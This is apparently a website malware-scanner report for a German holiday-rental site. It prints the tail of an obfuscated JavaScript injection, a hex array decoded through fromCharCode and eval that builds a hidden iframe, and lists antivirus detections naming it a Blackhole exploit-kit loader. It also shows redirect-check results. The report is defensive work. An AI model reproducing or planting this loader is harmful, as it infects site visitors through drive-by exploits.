...2,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");}w=f;s=[];for(i=20-20;-i+590!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ferienhaus-wuitschik-ruegen.de

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: ferienhaus-wuitschik-ruegen.de
Referer: http://www.google.com/search?q=ferienhaus-wuitschik-ruegen.de

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for ferienhaus-wuitschik-ruegen.de

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools